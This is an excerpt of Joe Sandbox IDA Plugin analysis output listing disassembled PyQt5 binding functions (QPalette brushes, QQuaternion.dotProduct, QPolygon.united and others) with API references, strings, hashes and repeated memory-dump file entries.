Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?setAdditionalFormatFormats@Layout@@Layout@@@@@List@Range@
String ID: BJ1$QTextLayout$setAdditionalFormats$setAdditionalFormats(self, overrides: Iterable[QTextLayout.FormatRange])
API String ID: 3110664100-92635248
Opcode ID: 710831724daa051dfe0a6f3a5bbc67744bbf10fdd02ddc8b3664e8ea282cc3d0
Instruction ID: 2d485f9261ced3cbeb55a6980c629868b718b316c2f5dfe07835c520f741e708
Opcode Fuzzy Hash: 710831724daa051dfe0a6f3a5bbc67744bbf10fdd02ddc8b3664e8ea282cc3d0
Instruction Fuzzy Hash: B0210276B08B46C1DB109F15E8985AD33B4FB48BA0F918072CA9D43720EF39D989C340

Function 00007FFD8627EFD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFD8627F038
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFD8627F044

Strings

QPalette, xrefs: 00007FFD8627F088
buttonText(self) -> QBrush, xrefs: 00007FFD8627F075
buttonText, xrefs: 00007FFD8627F081

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
String ID: QPalette$buttonText$buttonText(self) -> QBrush
API String ID: 868068763-1458772086
Opcode ID: 3bfa67ce451eebcaa02265a3146dc84339b1bac2bbd4818114fe313cadc456d8
Instruction ID: 67a4c8fad0b097a34b54930d6bd2f993457d1685f29317fdae4d806f7ae87847
Opcode Fuzzy Hash: 3bfa67ce451eebcaa02265a3146dc84339b1bac2bbd4818114fe313cadc456d8
Instruction Fuzzy Hash: AF118C75B18B8681EB00EF25E868BAD33A4FB88BA4F954076CA4D07320DF3DD949C740

Function 00007FFD8627CFE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFD8627D048
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFD8627D054

Strings

light(self) -> QBrush, xrefs: 00007FFD8627D085
light, xrefs: 00007FFD8627D091
QPalette, xrefs: 00007FFD8627D098

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
String ID: QPalette$light$light(self) -> QBrush
API String ID: 868068763-607792453
Opcode ID: 65df6b4b655a9bc15b2cead236213429a227d1c354ab166477771cd3687e9999
Instruction ID: bf799321ce3577f70cd1a4347d6ca7d099fef7572f4efc6acaccb63329b5508e
Opcode Fuzzy Hash: 65df6b4b655a9bc15b2cead236213429a227d1c354ab166477771cd3687e9999
Instruction Fuzzy Hash: 0C118C75B08B8681EB00EF25E868BAD33A4FB88BA4F954072CA4D07320DF7DD949C740

Function 00007FFD86280CF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFD86280D58
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFD86280D64

Strings

QPalette, xrefs: 00007FFD86280DA8
toolTipBase, xrefs: 00007FFD86280DA1
toolTipBase(self) -> QBrush, xrefs: 00007FFD86280D95

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
String ID: QPalette$toolTipBase$toolTipBase(self) -> QBrush
API String ID: 868068763-735950729
Opcode ID: 5f4b5ac99eb3fd4f7df8ff08ecb6fdf6578c38f61b6eaeaa2ce2fab8814ba656
Instruction ID: f44a45cea5a417d630997d4cfed6e74defecd8dbf3d70241e2765f1fa2ad0ae8
Opcode Fuzzy Hash: 5f4b5ac99eb3fd4f7df8ff08ecb6fdf6578c38f61b6eaeaa2ce2fab8814ba656
Instruction Fuzzy Hash: 40113A75B18B8681EB00EF25E8687AD33A4FB88BA4F954076CA4D07320DF7DD949C740

Function 00007FFD8627E220 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFD8627E288
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFD8627E294

Strings

alternateBase(self) -> QBrush, xrefs: 00007FFD8627E2C5
QPalette, xrefs: 00007FFD8627E2D8
alternateBase, xrefs: 00007FFD8627E2D1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
String ID: QPalette$alternateBase$alternateBase(self) -> QBrush
API String ID: 868068763-3096190680
Opcode ID: 3e139d1d055e5f01bc5d85c2e03eb684c6a59199a038706ad9205c5b740ee39a
Instruction ID: dbec15ca1805148a54e9dc88a67ff381f91ff33508b1cb8889ad25c0b1816e7d
Opcode Fuzzy Hash: 3e139d1d055e5f01bc5d85c2e03eb684c6a59199a038706ad9205c5b740ee39a
Instruction Fuzzy Hash: F9116A75B18B8681EB00EF25E868BAD33A4FB88BA4F954076CA4D47360DF3DD949C740

Function 00007FFD8624F020 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

?format@QPictureIO@@QEBAPEBDXZ.QT5GUI ref: 00007FFD8624F06B
PyUnicode_DecodeASCII.PYTHON3 ref: 00007FFD8624F0A2

Strings

format, xrefs: 00007FFD8624F0C0
QPictureIO, xrefs: 00007FFD8624F0C7
format(self) -> Optional[str], xrefs: 00007FFD8624F0B4

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?format@DecodePictureUnicode_
String ID: QPictureIO$format$format(self) -> Optional[str]
API String ID: 2623157473-1175929536
Opcode ID: acfedeb874333ad143d65c0914ef8db44a2d4a88a89857fec7dd56a1d4d62b1b
Instruction ID: 892003f1aab7655426d9941951519abcb70ca16bf21ddfdca435001cb25a8a74
Opcode Fuzzy Hash: acfedeb874333ad143d65c0914ef8db44a2d4a88a89857fec7dd56a1d4d62b1b
Instruction Fuzzy Hash: 5D118231F08A5A81EB009F24E8687AD33A4FB84BB4F955172CA2D033A0DF7CD949C340

Function 00007FFD862AAFA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 41COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFD862AB025

Strings

QQuaternion, xrefs: 00007FFD862AB04A
J9J9, xrefs: 00007FFD862AAFB6
dotProduct(q1: QQuaternion, q2: QQuaternion) -> float, xrefs: 00007FFD862AB037
dotProduct, xrefs: 00007FFD862AB043

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: J9J9$QQuaternion$dotProduct$dotProduct(q1: QQuaternion, q2: QQuaternion) -> float
API String ID: 329246742-4085906495
Opcode ID: d6177a1071737314668faa17990f562b66c43f113d8c2150a1933c3097f64bb8
Instruction ID: bcc867591829761b7f28a7b50ea92d09d4814597f8413edb4d53bc468088b7d4
Opcode Fuzzy Hash: d6177a1071737314668faa17990f562b66c43f113d8c2150a1933c3097f64bb8
Instruction Fuzzy Hash: 5D114236A19A4A96D701DF36D49429C73A0FB54B55F59C632CA0C63370DF39D849DB40

Function 00007FFD8628AD40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?createStroke@QPainterPathStroker@@QEBA?AVQPainterPath@@AEBV2@@Z.QT5GUI ref: 00007FFD8628ADB0

Strings

createStroke(self, path: QPainterPath) -> QPainterPath, xrefs: 00007FFD8628ADDC
BJ9, xrefs: 00007FFD8628AD66
QPainterPathStroker, xrefs: 00007FFD8628ADEF
createStroke, xrefs: 00007FFD8628ADE8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Painter$?createPathPath@@Stroke@Stroker@@V2@@malloc
String ID: BJ9$QPainterPathStroker$createStroke$createStroke(self, path: QPainterPath) -> QPainterPath
API String ID: 1521205396-500091838
Opcode ID: 1acaba5f703c4ce28ba611574051109ed8c088b9696a78878bbaef6071f58a38
Instruction ID: df42ba5e92f6e77c3fb95cb484b847efe35cc541817a93147765d180f831c7d4
Opcode Fuzzy Hash: 1acaba5f703c4ce28ba611574051109ed8c088b9696a78878bbaef6071f58a38
Instruction Fuzzy Hash: A0111676B18E4681EB40DF29E8A86AD33A5FB48BA0F954176CA5C43320DF3DD949C740

Function 00007FFD86230E70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?united@QPolygon@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FFD86230ED9

Strings

QPolygon, xrefs: 00007FFD86230F18
BJ9, xrefs: 00007FFD86230E9E
united(self, r: QPolygon) -> QPolygon, xrefs: 00007FFD86230F05
united, xrefs: 00007FFD86230F11

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?united@Polygon@@V1@@malloc
String ID: BJ9$QPolygon$united$united(self, r: QPolygon) -> QPolygon
API String ID: 79664869-2792011416
Opcode ID: a303f52309bf28241b060da2401b65ea02d9284b74d92b781dfab5681fd9a9d8
Instruction ID: 0073f042ba8dc9b24260190e14bad1dc58f7c5b08d05b89f80a9b160fa25061f
Opcode Fuzzy Hash: a303f52309bf28241b060da2401b65ea02d9284b74d92b781dfab5681fd9a9d8
Instruction Fuzzy Hash: BF112876B18E8681EB00DF65E8A87AD33A5FB44BA0F954076CA4D47320DF3DD959C740

Function 00007FFD86232E30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 40COMMON

Download Yara Rule

APIs

?changePersistentIndex@QAbstractItemModel@@IEAAXAEBVQModelIndex@@0@Z.QT5CORE ref: 00007FFD86232EA7

Strings

BJ9J9, xrefs: 00007FFD86232E5E
changePersistentIndex, xrefs: 00007FFD86232ED9
QStandardItemModel, xrefs: 00007FFD86232EE0
changePersistentIndex(self, from_: QModelIndex, to: QModelIndex), xrefs: 00007FFD86232ECA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
